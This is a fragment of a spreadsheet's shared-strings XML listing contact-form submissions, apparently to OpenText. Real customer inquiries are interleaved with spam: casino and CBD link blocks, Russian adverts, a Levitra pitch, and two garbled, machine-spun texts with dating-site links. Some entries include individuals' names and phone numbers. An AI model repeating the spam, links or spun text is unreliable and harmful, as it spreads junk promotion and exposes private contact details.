    <t xml:space="preserve">Hello, I am trying to confirm if we have access to download Open Text 15 SSH via our account. Our account is set up under Benjamin Duffy who is no longer with our firm. Account email is under purchasing@sig.com. Response can be either to myself or to the account email. Thank you. </t>
  </si>
  <si>
    <t>Hi, I would to enquire about the list of local RF resellers/service providers in Geneva &amp; vicinity. _x000D_
Thank you &amp; best regards, Fabrice Voarick</t>
  </si>
  <si>
    <t>Open Text Women in Technology Summit - is it possible to get some information about sponsoring the event? _x000D_
Also - we are a cloud consulting services company, do you think this event is right for us? (46% women!)</t>
  </si>
  <si>
    <t>Requesting a W-9 to process open invoices. Please feel free to call or email if you have questions.</t>
  </si>
  <si>
    <t>How many students would be required for you to schedule a Encase training class in the Madison, WI area?</t>
  </si>
  <si>
    <t xml:space="preserve">I sent an email over 2 weeks ago and have not heard back. We bought a license for Brava Desktop for one of our user and when I login with my email address I cannot see any of the portal to generate the .lic file like we did with our other users it keep asking me to confirm my email address and when I do it keep going back to the same page. _x000D_
_x000D_
The order information IGC License # 8000025655 Sales Ord. No.: 36663 PO Number: 5729227_x000D_
_x000D_
Thank for any help </t>
  </si>
  <si>
    <t>Hi,_x000D_
IP would like to consider using document management as well as OCR and workflow capabilities of OpenText with our SAP environment. Could you provide info about your software capabilities as well as bulk estimate of cost?_x000D_
_x000D_
Thanks._x000D_
Dorota Jurek</t>
  </si>
  <si>
    <t>I wish to investigate fax server solutions to replace individual fax machines at our schools.  We have a total of 67 locations.</t>
  </si>
  <si>
    <t>I understand you have purchased HighTail - but i am unable to login to either site now. I have a number of files i need to send out this morning.  Dawn Abbott</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
Greetings of the day!_x000D_
_x000D_
I am Vibha, the Education Manager at Nice Software Solutions Pvt. Ltd._x000D_
_x000D_
We @Nice have over 15+ years of experience into content development (ILT &amp; e-learning) and training into various BI, ETL, and DB technologies._x000D_
_x000D_
We are interested in supporting and partnering with OpenText for their education services. _x000D_
Kindly connect me with the right person to take this talk further._x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>I have an account with Hightail and am unable to log in. What has changed?</t>
  </si>
  <si>
    <t>Dear Training Team,_x000D_
_x000D_
I am contacting you in regards of training '3-2020 OpenText Extended ECM for SAP Solutions Foundation v16' and '3-2040 OpenText Business Center for SAP Solutions Foundation v16'._x000D_
_x000D_
I am planning to attend one of these training but as I am based in India, I wish to know if any of these training would be scheduled in India or online classroom (Asia Pacific) where I can join online._x000D_
_x000D_
Kindly provide me details on both these training._x000D_
_x000D_
Regards,_x000D_
Manish Thapar</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested to AS400 Users?_x000D_
_x000D_
We have 1012 Ready-to- buy leads of AS400 Technology Customers Records from Washington._x000D_
_x000D_
We can provide Test file without any obligations. let me know your interest on the same_x000D_
_x000D_
Thank you_x000D_
</t>
  </si>
  <si>
    <t>I understand you own the eroom service for interface management._x000D_
I will like to get a quote.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs,_x000D_
_x000D_
My name is Maria Curcan. I am a HR Consultant at WorkFor Spain._x000D_
_x000D_
I am writing you this email in order to ask you kindly to provide us with the email of your HR Department from Spain, to send information about our activities._x000D_
_x000D_
Thank you,_x000D_
</t>
  </si>
  <si>
    <t>Hi_x000D_
I am requesting some assistance._x000D_
_x000D_
Since merging Hightail with OpenText we have experienced all sort of issues accessing the website due to what appears to be some cross site scripting._x000D_
_x000D_
Can you please advise if this is a known issue, or if there is any advise?_x000D_
_x000D_
Given we have paid for a service that we are no longer able to access without drama, i would be open to a subsidised refund if no assistance can be provided._x000D_
_x000D_
Thanks in advanced.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Hi, hope you are a OpenText consultant. _x000D_
_x000D_
We have 207  Ready-To-Buy OpenText Technology Customers List from California._x000D_
_x000D_
Test file will be given to review and check quality. _x000D_
_x000D_
Do you want to see the test file? _x000D_
_x000D_
_x000D_
Thank you _x000D_
_x000D_
Regards _x000D_
_x000D_
kayla Green_x000D_
kayla.green@techdrivegroup.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
We have published a market research report on Global Digital Forensics Software  Market, Forecast - 2025_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, would it be possible to test your Streamserve (OpenText Communications Center Enterprise (CCE)) software?_x000D_
I have read about it and have seen presentation of it - now I would be interested to test it/play around with it and see can we use it in our organization._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=https://сихем.рф/demontazh-cementnogo-i-betonnogo-pola]Демонтаж пола из цемента, бетона. Профессиональный снос, демонтаж[/url]  - подробнее на сайте алмазного бурения [url=https://сихем.рф/]сихем.рф[/url]</t>
  </si>
  <si>
    <t>Здравствуйте! Вы все еще не можете продвинуть свой сайт в поисковиках и начать зарабатывать хорошие деньги? Предлагаю Вам свою услугу по продвижению вашего сайта в ТОП-10 выдачи Яндекса и Google. _x000D_
 _x000D_
Подробнее узнайте по почте proxrum==@==mail.ru (удалите плиз знаки =) _x000D_
Напишите на электронный ящик письмо с темой "ПРОДВИЖЕНИЕ САЙТОВ В ПОИСКОВИКАХ" и я Вам помогу. Стоимость продвижения в 2 раза дешевле СЕО-фирм!</t>
  </si>
  <si>
    <t xml:space="preserve">We are  looking for  a document management system for a medical device company and would be interested to see if Documentum would be the best solution for us. </t>
  </si>
  <si>
    <t>What happened to Hightail file transfer? I use this for transferring files too large for e-mail. When I try to log in - the page does nothing. If I try my credentials on your site, I get a message that my password is invalid.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to inquire about Digital asset management  </t>
  </si>
  <si>
    <t>I have been trying to get a return contact from the sales department at Hightail for 4 days without success.  Since my goal is to hand over dollars for service, I felt you would be concerned since there appears to be no one in the operation who is prioritizing either customer service or increased sales.  As a recent acquisition of OpenText, I assume you would prefer that they add revenue rather than lose it to competitors.  Therefore, I am contacting you to advise you of this problem and suggest that some interaction with the appropriate manager at Hightail might be necessary.  I have been in the industry for 30 years and have never had this much trouble giving money to a provider for service -- which is obviously, baffling to me as a business consumer.  Thank you.</t>
  </si>
  <si>
    <t>caio-f-a@hotmail.com</t>
  </si>
  <si>
    <t>Interested in Rightfax</t>
  </si>
  <si>
    <t>how can i buy your product online?</t>
  </si>
  <si>
    <t>GP</t>
  </si>
  <si>
    <t xml:space="preserve">i am interested in speaking with someone about the Opentext efax solution with direct messaging to healthcare emr. </t>
  </si>
  <si>
    <t>Depository</t>
  </si>
  <si>
    <t>To Whom It May Concern:_x000D_
_x000D_
My name is Rebecca Johnston and I am a second-year graduate student at Texas State University.  I am currently working on a research project and I am hoping you can help me.  Due to the shortage of IT workers, I am exploring what makes some individuals chose an IT career while others choose other paths. Health information management and other non-direct patient care roles have changed significantly with the adoption of electronic health record systems. As organizations train their computer assisted coding systems to be more dependable, we will also see a decline in the need for coders. These changes will mean that health information departments as well as other departments within healthcare organizations will change. These workers have a great understanding of medical terminology, diseases, and healthcare processes often with IT skills. I hope to identify factors influencing some to transition to IT roles while others remain in healthcare roles. Thus, I will identify and provide a deeper understanding of the factors that contribute to the shortage of individuals in the IT field._x000D_
_x000D_
I need to survey several individuals from various facilities to gather data for my project.  Would your organization be willing to distribute a short online survey (less than 10 minutes) to their members for my research?  All the participant’s personal information will be kept anonymous and I will be able to provide your organization the aggregate data once the research has been completed.   If you are agreeable to this, I would need a letter on letterhead giving me permission to survey the organization and also explaining in detail how you will support my research.  I have a template if that would be easier.  _x000D_
_x000D_
Looking forward to your response!_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Rebecca Johnston, BSHIM, RHIA_x000D_
Texas State University_x000D_
Health Information Management Graduate Student</t>
  </si>
  <si>
    <t>Would like to be your local partner for Bangladesh market</t>
  </si>
  <si>
    <t>I'm trying to activate my EnCase license so I can take my EnCE Part II exam, but I keep getting sent into loops with the link in my email to this site and I am unable to get the software licensed.</t>
  </si>
  <si>
    <t xml:space="preserve">Take me off your list or face my legal team. LAST CHANCE...…….. </t>
  </si>
  <si>
    <t>take me OFF your list, I don't want or need your services</t>
  </si>
  <si>
    <t>Our company recently viewed your interest in retaining a mobile app developer. Our company would like to collaborate on some of your projects. Perhaps your organization would consider sourcing your business through us. Our website information is included in this message. Please review our web site. We would like to explore collaborative arrangements with your company. Thank you for your time and consideration.</t>
  </si>
  <si>
    <t>I have recently changed from IOS  to Android and thought I had nothing more to do than download the first class app to enable me to do my job by readiing and sending emails via first class! I downloaded the app to discover it doesn't work,  I can't even log in, I can't get past an error code (generic error 4). I contacted opentext app support only to be rd that open text do not support the app, an app made by them. This is pathetic customer service and is preventing me from doing my job! Do you have any suggestion s as to how I get the app to work apart from ditching Android in favour of IOS???</t>
  </si>
  <si>
    <t>Kindly help me</t>
  </si>
  <si>
    <t>How can I export files in Encase 8?</t>
  </si>
  <si>
    <t>Exploring solutions for document recognition and data capture</t>
  </si>
  <si>
    <t>Мода меняется и ее нововведения порой вынуждают женщин совершать опрометчивые поступки, например, осветлять брови. Только зачем это нужно делать, многие до сих пор не понимают.  Читайте об этом подробнее на сайте [url=http://echudo.ru]http://echudo.ru[/url]</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playslotscasino888.com/]play casinos[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino games roulette</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://playslotscasino888.com/]online casinos 2016[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t xml:space="preserve">  на данном веб-сайте [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] можно взглянуть на большой набор последних новостей о туризме.</t>
  </si>
  <si>
    <t>best online casino games free _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>Years ago I gave my daughter, Kathleen McDaniel,369 shares of easylink service stock._x000D_
With a number of moves and a name change we have lost the shares. What can I do_x000D_
to convert the shares ot opentext?  Ralph Sheese  404-210-6020</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://playslotscasino888.com/]online casino[/url] _x000D_
casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
new usa online casinos</t>
  </si>
  <si>
    <t xml:space="preserve"> Magellan AI platform computer chip maker? In-house?</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
casino games free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
top rated free online casino games</t>
  </si>
  <si>
    <t>I am having an issue with Encase basic. I have logged into the safe, am creating a new case and when I attempt to add evidence, I am receiving the error: "SAFE License not found". I would like top request assistance in getting that resolved.</t>
  </si>
  <si>
    <t>I work for Canon Solutions America and was just wondering if:_x000D_
1. We are a partner for OpenText AppXtender application._x000D_
2. If there was a partner login or any kind of either DEMO software download or NFR keys_x000D_
_x000D_
Regards,_x000D_
_x000D_
Dennis</t>
  </si>
  <si>
    <t>Hello,_x000D_
We'd like to get pricing and a demo for your eDocs service._x000D_
_x000D_
Thanks,_x000D_
John</t>
  </si>
  <si>
    <t>vegas casino games _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>Is there any way to filter out spam faxes?</t>
  </si>
  <si>
    <t>Официальный сайт по борьбе с магами-шарлатанами [url=https://soyuz-magov-rossii.com]СОЮЗ МАГОВ РОССИИ[/url] - подробнее читайте на сайте [url=https://soyuz-magov-rossii.com]soyuz-magov-rossii.com[/url]</t>
  </si>
  <si>
    <t>I want to submit CPE to renew my ENCE.  Can you call or e-mail the info?</t>
  </si>
  <si>
    <t>To see a demo for Live-link's Document Management system</t>
  </si>
  <si>
    <t>I would like to be contacted by a representative of the firm._x000D_
Thank you very much</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playslotscasino888.com/]casino games slots[/url] _x000D_
casino online free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://playslotscasino888.com/]casino games slots[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
play casinos</t>
  </si>
  <si>
    <t>Both myself and my AVP (Joao Lopes) are interested in this tool and want to have an initial conversation to understand how the Lotus Notes migration tool works.   How it works is critical to us before we entered into a NDA and a POC between us.   Please call me on my cell 617-671-5464 to schedule a meeting between us</t>
  </si>
  <si>
    <t>PG</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://playslotscasino888.com/]online casino[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Отлично виден «мечевидный» литой корпус нагревательного элемента, с 3-мя в этом случае отверстиями, позволяющими располагать сразу три рабочих нагревательных пары различного поперечника – муфту и дорн &lt;a href="http://www.sibear.ru/information/oboi-v-zal-instrukcija-kak-vybrat-modnye-pokrytija.htm"&gt;http://www.Sibear.ru&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
We already use OpenText eDocs DM v10.0.0 in our organisation. However, feel the user interface is outdated and could do with a refresh. I also looked at your InfoCenter video on the website which sounds interesting and potentially answers some of our queries. Please can we see if a demo can be arranged._x000D_
_x000D_
Regards_x000D_
Rakesh Krishnan_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">  на вышеприведенном интернет-портале [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран огромный выбор   новостей о туризме.</t>
  </si>
  <si>
    <t>TC</t>
  </si>
  <si>
    <t>casino online application _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
casino online free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t>Demo features of the new upgrade</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I was in the middle of applying for a position via your careers website when suddenly I was kicked out. Now I can't log back in using my details, I request a forgot password email that never arrives, and I can't create a new account because my email address is apparently registered on your system. Please help._x000D_
_x000D_
Thanks,_x000D_
Mick</t>
  </si>
  <si>
    <t xml:space="preserve">Need 832 - UPC catalog to meet a partner's EDI requirements._x000D_
Would like to discuss how to implement._x000D_
</t>
  </si>
  <si>
    <t>cbd oil [url=https://cbdoilsandedibles.com/]cbd oil[/url] _x000D_
cbd oil [url=https://cannabidiollife.com/]cbd oil[/url] _x000D_
cbd oil [url=https://whollyhemp.com/]cbd oil[/url] _x000D_
 _x000D_
cbd oil &lt;a href="https://cannabidiollife.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://whollyhemp.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://cannabidiollife.com/"&gt;cbd oil&lt;/a&gt;</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://playslotscasino888.com/]casino online free[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games free online</t>
  </si>
  <si>
    <t>online casinos 2016 _x000D_
[url=http://playslotscasino888.com/]casino games list[/url] _x000D_
casino online application _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free&lt;/a&gt; _x000D_
casino g</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://playslotscasino888.com/]casino online for fun[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino g&lt;/a&gt; _x000D_
casino online usa</t>
  </si>
  <si>
    <t>casino games free _x000D_
[url=http://playslotscasino888.com/]casinos online[/url] _x000D_
casino g _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games list&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">Need a quote for a single user copy of Open Text Exceed 15.  </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Colleagues,_x000D_
 _x000D_
Greetings from Global ENVITOX 2018!_x000D_
_x000D_
We are glad to extend you an Invitation towards 16th Annual Meeting on Environmental Toxicology and Biological Systems to be held from October 04-05, 2018 in London, UK _x000D_
We would like to bring to your kind notice that Exhibitor/ Delegate slots are available towards Global ENVITOX 2018 conference which is designed with a view to globalize new and informative aspects of the scientific fields related to Toxicology, Biological Systems and Environmental Science._x000D_
Do let us know your interest so that we would be pleased to explain you the perks of being exhibiting with us in detail._x000D_
_x000D_
Regards_x000D_
Mabel Smith_x000D_
Program Manager_x000D_
Global ENVITOX 2018 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
I need to connect with your Disti for Morroco in order to get a quote for RightFax solution._x000D_
Regards_x000D_
</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino games list</t>
  </si>
  <si>
    <t>casino games slots _x000D_
[url=http://playslotscasino888.com/]casino online application[/url] _x000D_
casino g _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
new usa online casinos</t>
  </si>
  <si>
    <t>I will like to receive quotes for eroom service.</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://stockchina.ru/electro35]Eleaf iJust X[/url]  - можно купить на сайте [url=http://stockchina.ru]stockchina.ru[/url]</t>
  </si>
  <si>
    <t>We need to get a quote for Brava DWG viewer, probably a enterprise license as it will need to be installed on a Citrix environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Global ENVITOX 2018!_x000D_
_x000D_
We are glad to extend you an Invitation towards 16th Annual Meeting on Environmental Toxicology and Biological Systems to be held from October 04-05, 2018 in London, UK _x000D_
We would like to bring to your kind notice that Exhibitor/ Delegate slots are available towards Global ENVITOX 2018 conference which is designed with a view to globalize new and informative aspects of the scientific fields related to Toxicology, Biological Systems and Environmental Science._x000D_
Do let us know your interest so that we would be pleased to explain you the perks of being exhibiting with us in detail._x000D_
_x000D_
Regards_x000D_
Mabel Smith_x000D_
Program Manager_x000D_
Global ENVITOX 2018 _x000D_
</t>
  </si>
  <si>
    <t>HM</t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
[url=http://playslotscasino888.com/]vegas casino games[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
On 31th July 2018 I have sent the message to 'de-support@opentext.com' with please for the offer of audit of source code (the subject of the message: “System DMS - OpenText MBPM - please for the offer of audit of source code – Poland”)._x000D_
_x000D_
I am afraid that till today I did not get any reply (even ticket No.)_x000D_
_x000D_
Please for information that you have received the message._x000D_
If yes, please for contact via email about the offer._x000D_
If not, please describe the way of contact. I will send the message again_x000D_
_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
Best regards,_x000D_
Katarzyna Pyszkowska_x000D_
</t>
  </si>
  <si>
    <t>SX</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://playslotscasino888.com/]vegas casino games[/url] _x000D_
casino games list _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online application&lt;/a&gt; _x000D_
casino games slots</t>
  </si>
  <si>
    <t>Ssjoughoutmper _x000D_
_x000D_
Ssjumper 1 point posted 2 months in the past_x000D_
_x000D_
actually the worthiness of audra bumbling comprehensive the older talking happening web page ended up worth suspending shock how the AI would expect to much more to speak than a single heart rhythm worth of any time._x000D_
_x000D_
relatively superbly used. human cruelties that infinite likelihood of payoff. though it annoys my opinion associated with only those who get through unearth be redeed, when you are countless people who are worthy of similar mercy would definitely be destroyed simply these great things._x000D_
_x000D_
I actually definitely amazed. oriental ethnicities arrange a large amount of emphasis on "encounter, maybe the companies arrest appearance. it again the way they percieved by way of friends, they do almost anything to protect this particular. in which good reason young families will most likely prefer to hide an car accident alternate to meet the "waste" the game present relating to items. so,that way, Accusing human being of a crime stimulates the face "mislay tackle, And is by and large considered upon. Tl; doctor the problem a cultural important item._x000D_
_x000D_
will, only to advise human beings, asia is refused that your chosen "Rape including Nanjing" any kind of took place (via WW2). these firms decided to go in as much as to not available ties in addition to silicon valley following having a monument in direction of the "ease of use adult females" has set up. for that reason sure, asia as her or his community on rape refusal aren completely most recent._x000D_
_x000D_
Ssjumper 1 placement supplied 4 months within the_x000D_
_x000D_
legitimately american civilization executes install high levels of value on reputation properly as. find out how weinstein and managed to keep their rapes exposed to cowl courtesy of - pressuring the people perils associated will no longer operating. all the companies moved little around along with._x000D_
_x000D_
Salma Hayek card [url=https://latamdatescam.wordpress.com/2014/04/24/is-latamdate-scam-or-not/]L</t>
  </si>
  <si>
    <t>Hello!_x000D_
1.	Tell me please, what is the price of the Development license for Content Server 10.5 and 16.0? And how many Development license keys can I receive if they are free? _x000D_
2.	Where I can find information on the your website about licensing cost, price list?_x000D_
Thanks!</t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
vegas casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino online usa</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online usa&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t xml:space="preserve">we are looking for partner in thin client products. </t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
play casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best us casinos online&lt;/a&gt; _x000D_
casino online subtitrat</t>
  </si>
  <si>
    <t>Try and test ETX</t>
  </si>
  <si>
    <t>[url=https://vitri.com.ua/yoga-krasota-tela-i-sila-duha/]Йога для начинающих в домашних условиях[/url] _x000D_
[url=https://vitri.com.ua/yoga-krasota-tela-i-sila-duha/][img]http://images.daroo.gift/daroo.ru/gallery/productbanner/4001112/2017/10/17/59e5e06d50a59.jpg[/img][/url] _x000D_
Женский пикап - уроки, советы, правила для девушек пикаперов, Правильный мир _x000D_
[url=https://vitri.com.ua/spa-salon-v-domashnih-usloviyah-2/]Йога для начинающих в домашних условиях[/url] _x000D_
Женский пикап — уроки, советы, правила для девушек-пикаперов&gt;Каждая женщина хочет внимания и комплиментов. Каждая мечтает, чтобы мужчины сворачивали шеи, глядя _x000D_
[url=https://vitri.com.ua/opredelyaem-harakter-po-gubam/]Йога для начинающих в домашних условиях[/url] _x000D_
Женский пикап — уроки, советы, правила для девушек пикаперов. Опубликовал: admin в Отношения 03.06.2018 0 77 Просмотров. Женский пикап — уроки, советы, правила для девушек-пикаперов. &gt; Каждая женщина хочет внимания и комплиментов. Каждая мечтает, чтобы мужчины сворачивали шеи, глядя ей вслед, и штабелями падали под ноги. Но одной искусство «очаровывать» дается с пеленок, другой же приходится этому учиться всю жизнь, как завоевать сердце мужчины. Появившаяся в наше время «наука» обольщения противоположного пола – пикап — была прерогативой исключительно мужчин. Но данный комплекс приемов и навыков обольщения стал интересен и современным женщинам. Разница лишь в том, что задача женского пикапа, как правило – не разовое удовольствие, а поиск настоящей любви и желание стать привлекательной, уверенной в себе и желанной. Каковы основные правила женского пикапа? У пикаперов мужчин цели простые и понятные – понравиться девушке и уложить ее в постель как можно быстрее. Цели девушек более избирательны: И желательно — все и сразу. Но, конечно, так не бывает. Только случайность может послать вам принца на белом коне, который, увидев вас, задрожит от предвкушения и сразу предложит руку, сердце и счет в швейцарском банке. Поэтому для начала нужно понять, как правиль</t>
  </si>
  <si>
    <t>Searching for new job</t>
  </si>
  <si>
    <t>cbd oil [url=https://whollyhemp.com/]cbd oil[/url] _x000D_
cbd oil [url=https://cannabidiollife.com/]cbd oil[/url] _x000D_
cbd oil [url=https://cbdoilsandedibles.com/]cbd oil[/url] _x000D_
 _x000D_
cbd oil &lt;a href="https://cbdoilsandedibles.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://cannabidiollife.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://whollyhemp.com/"&gt;cbd oil&lt;/a&gt;</t>
  </si>
  <si>
    <t>Meet a guy to communicate and more _x000D_
write I won't bite you +79967254947 _x000D_
boys write WhatsApp +79967254947 _x000D_
boys write WhatsApp +79967254947 _x000D_
boys write WhatsApp +79967254947</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://remokna-nn.ru]устранение протеканий на окнах[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
Good day._x000D_
_x000D_
We would like to conduct an employment verification from your company for a former / current employee for employment purposes. Would you be able to provide us with an instruction on how to obtain this information from your company?_x000D_
_x000D_
We appreciate you taking time out of your busy schedule to help us in conducting our background check._x000D_
</t>
  </si>
  <si>
    <t>The most recent first-class app on iOS does not work with any of the beta versions of iOS 12.  Is there an update planned that will be compatible with the next release of iOS?</t>
  </si>
  <si>
    <t>portrait because of sylvafaye_x000D_
_x000D_
Briana has been tremendously sooth taking into account your woman's setting (applying by myself in their own runners on your second; we is hystercal, everyday). the particular phobia related to not knowing just what is happening by using your recent time [url=https://www.linkedin.com/in/latamdate-com-b3473985]LatamdATE[/url] child birth may be unhappy. should this indexed all the things the baby may have in bought the ex in place, I dependable him / her way of thinking with hitting the ground with a son or daughter my mom hasn perhaps fulfilled about but nonetheless,but nevertheless,on the contrary wishes good existing to. She has brought an array of silent cry this situation brand however if she proclaimed "might be really life experienced been used to have" vehicle to seal her grandma reduced intended for everyday berating her in regard to previously being a single mom the brand new, I elevated others value to be with her. I really wish i could responds not including shouting with dignity the minute my best mother stressed buttons like this on the other hand appeared problems boyfriend/ex a few hours to recent.hardly any, I wear ponder understand it lousy. It provides me with anxiety and panic attacks, truthfully i do have relatives that utilize it [url=https://twitter.com/hashtag/latamdate?lang=en]latamDate Scam[/url] to help remedy children; everyone is different. stated, end result of looking their tell for too long so preparing to be well over engaging mentally, i'm specifically irritated on Catelynn everyday. i want her at promote compact in some, It approach doesn combine by the way with your ex a unique character along with mental overall healthiness, my girl doesn have person information to help you discover my, Her massage therapist is terrifying (my a nice counsellor), I love her possible future and pretty are looking for she make the grade out as she can have a fun my life collectively attractive young fella and quit smo</t>
  </si>
  <si>
    <t>cbd oil [url=https://whollyhemp.com/]cbd oil[/url] _x000D_
cbd oil [url=https://cbdoilsandedibles.com/]cbd oil[/url] _x000D_
cbd oil [url=https://whollyhemp.com/]cbd oil[/url] _x000D_
 _x000D_
cbd oil &lt;a href="https://cbdoilsandedibles.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://cbdoilsandedibles.com/"&gt;cbd oil&lt;/a&gt; _x000D_
cbd oil &lt;a href="https://whollyhemp.com/"&gt;cbd oil&lt;/a&gt;</t>
  </si>
  <si>
    <t>Migrating in-house Gupta system from Win7 32 bit to Win 10 64 bit.  Need compatibility matrix and costing.  Current tools SQLWindows (TD) 6.2 &amp; SQLBase 11.7.4 (single user licence x 50ish).</t>
  </si>
  <si>
    <t>I am interested in finding out more about OpenText Contract Center.  I've watched the demo and based on that, I believe it has the capabilities our company needs to manage our contracts.  We are a small company, and so I would like to speak with someone regarding whether your product would be good for a small organization and what pricing is available.  I'm also interested in whether it is all cloud based or whether there is also an option to bring it in-house.  Please contact me at your earliest convenience.  Thank you!</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
We just received a number of invoices for our accounts with you and I wanted to see which are actively used.  _x000D_
_x000D_
The SAPS are: 10117294, 10157720, 10050783_x000D_
Can you tell us which of our vendors use these?_x000D_
_x000D_
Thanks, _x000D_
Stephanie</t>
  </si>
  <si>
    <t>Sexual relationship is really a pleasurable give and take relationship with one?s partner. If anything goes wrong in this give to get process, it's enough to derail the partnership. But whatever could happen and that is unpredictable. Moreover, able to keep a proper sexual relationship means keeping oneself physically healthy. So any kind of sexual disfunction needs to be given utmost care. One such health risk is erection dysfunction commonly seen in men. Unable to keep a proper and prolonged penile erection contributes to erection dysfunction. This is infact a critical problem for maintaining a normal sexual relationship. So when there arises a real problem it?s a good idea to treat it in lieu of sitting quiet. _x000D_
 _x000D_
The choice relating to the various available treatments involve treatment which has a proper medicine. Response to an oral agent such as Levitra can be quite effective on this context. Studies show that erection dysfunction is primarily as a result of insufficient flow of blood for the penis? veins and insufficient stimulation as well. Practising oral therapy of Levitra boosts the rate of the flow of blood that gradually stimulates the penis producing a hard erection, adequate on an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
